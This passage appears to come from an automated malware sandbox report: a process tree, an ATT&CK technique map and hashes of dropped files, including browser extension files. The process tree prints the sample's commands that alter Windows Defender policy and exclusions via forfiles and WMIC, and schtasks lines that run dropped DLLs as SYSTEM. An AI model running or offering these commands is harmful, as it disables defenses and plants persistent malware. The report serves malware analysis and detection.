                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:3380
                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Indirect Command Execution
                                                                                                                                                                                                    PID:4056
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:3556
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:1416
                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                      PID:1088
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:2076
                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:3276
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:1680
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:1444
                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:2648
                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                          PID:4012
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                            PID:1492
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                              PID:3528
                                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:3756
                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                          schtasks /DELETE /F /TN "bAqRDoFVIdSJfWxTlj"
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:3672
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:4024
                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                            PID:3736
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:3508
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                  PID:2384
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:1800
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                              PID:1984
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:3932
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:2532
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:2280
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BRWHUqYPU\CQPSVb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MHiaqjbnoCNpItK" /V1 /F
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:2024
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /CREATE /TN "MHiaqjbnoCNpItK2" /F /xml "C:\Program Files (x86)\BRWHUqYPU\pVuqnHB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                PID:1084
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /END /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:1924
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:2404
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\ozIDfSN.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:1736
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\lLtxrmd.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:2680
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\jFbkQlH.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:3288
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\EeUiDal.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:3548
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 01:09:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\RxJIZhTE\pHauIZR.dll\",#1 /JdidbE 385121" /V1 /F
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:3456
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                    PID:3252
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "Jcpae1" /SC once /ST 12:51:11 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                    PID:3904
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /run /I /tn "Jcpae1"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1724
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /DELETE /F /TN "Jcpae1"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                      PID:2060
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3248
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3792 -s 1544
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:2440
                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\RxJIZhTE\pHauIZR.dll",#1 /JdidbE 385121
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:2264
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\RxJIZhTE\pHauIZR.dll",#1 /JdidbE 385121
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                          PID:1696
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            PID:2328
                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:3992
                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1924
                                                                                                                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe "1418240007-1061564194-2228758932137323373188267184293663174-2004145709505311405"
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:3972
                                                                                                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:2884

                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                            Reconnaissance

                                                                                                                                                                                                                            Resource Development

                                                                                                                                                                                                                            Initial Access

                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                            Command and Scripting Interpreter

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1059

                                                                                                                                                                                                                            PowerShell

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1059.001

                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1053.005

                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1547

                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1547.001

                                                                                                                                                                                                                            Create or Modify System Process

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1543

                                                                                                                                                                                                                            Windows Service

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1543.003

                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1053.005

                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                            Boot or Logon Autostart Execution

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1547

                                                                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1547.001

                                                                                                                                                                                                                            Create or Modify System Process

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1543

                                                                                                                                                                                                                            Windows Service

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1543.003

                                                                                                                                                                                                                            Scheduled Task/Job

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1053.005

                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                            Impair Defenses

                                                                                                                                                                                                                            2
                                                                                                                                                                                                                            T1562

                                                                                                                                                                                                                            Disable or Modify Tools

                                                                                                                                                                                                                            2
                                                                                                                                                                                                                            T1562.001

                                                                                                                                                                                                                            Indirect Command Execution

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1202

                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                            4
                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                            Subvert Trust Controls

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1553

                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1553.004

                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                            2
                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                            Credentials from Password Stores

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1555

                                                                                                                                                                                                                            Credentials from Web Browsers

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1555.003

                                                                                                                                                                                                                            Unsecured Credentials

                                                                                                                                                                                                                            4
                                                                                                                                                                                                                            T1552

                                                                                                                                                                                                                            Credentials In Files

                                                                                                                                                                                                                            4
                                                                                                                                                                                                                            T1552.001

                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                            Process Discovery

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1057

                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                            8
                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                            5
                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                            System Location Discovery

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1614

                                                                                                                                                                                                                            System Language Discovery

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1614.001

                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                            2
                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                            Lateral Movement

                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                            3
                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                            1
                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                            Exfiltration

                                                                                                                                                                                                                            Impact

                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              2.1MB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              d0b7e112f9fdb0bb9a65d869ef44efcc

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              68bc335ae1e1284b24297c65fb3b583177a395ec

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              10acd10d4e9858c4a6737d52d59df383de483c2a368e319bb5cb06f32d7eaab9

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              952021554aa50a0f3942e0c7f8e3291ec699e4ae318774e8feadaf7b26d4fa42d045c3f651fb76fe0971db63b4d17f047964950d81fc45a7486a022dcd32504e

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\ProgramData\CAAKFIID
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              92KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              882ec2bb4bf46a0ee80134f7b7b5d2d7

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              4f76f5db450eb1a57199f5e0bb4bb6a61b4a5d7a

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              a101a238346d9df0fe89b33f45436042d92878d75c5528ad0b8e201b91db0402

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              eed22fb4d714d6c438760378912286d41f4f1e1ad27d62240fd9fc3c304831567e552e2ffe2524a0869d57a0fd7c6494a1fbf1e0d8eb78f58a052be3a3c4caaf

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              a266bb7dcc38a562631361bbf61dd11b

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              342B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              6865c7a7e662423eb175c65a2bf9bb28

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              a4b09b86dbedb3908fa3064d1d6993659c3357fd

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              f47b008e583b6179c34b0c5e5d2f86a244086f07e4d9b3f7ada83e93266bef3e

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              393102015263c8f36beadbbe218dd3d9017a0daedbdb5c7fd304fc2f34c52fab3290574e6bbbc757bcbbbf69e788cd36e9274b897af289da7e18f33d372aeadf

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              242B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              3c0916f7220883b03673447ba085f8cc

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              1492d8f7bd89f400949ba8b201a94978f4a6f175

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              4739ee5dcbfa7df4de0306c6ea7f18ad6d475ab13bb124141ad19ba851ad6757

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              16d885fb0e695e680a0a3dd33221778db930de8027587d59e4d14ff9afd94f02c9e386652cb1e8b5357e4259a9ba8e4babac874720dae4a7ab967bce420c6c08

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              187B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              136B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              150B

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                              10KB

                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                              d3725b48d644029187f5a97e71a44e0a

                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                              307fa66927843b8412a1eaa177c02c21b323e27f

                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                              2b3ef9c939d66170d00b88e466c61c524acd7d8ece0415e143cbdc62bebccd03

                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                              a8bc501747c95b16e1a204f2abc2e91a3569bf0ddd161ef4a0ede104d36d8f74af6bc5093d54b135b7a461c99d17dee20e63e384cfd6d3223b2027cb498c391f

                                                                                                                                                                                                                              Download Submit

                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
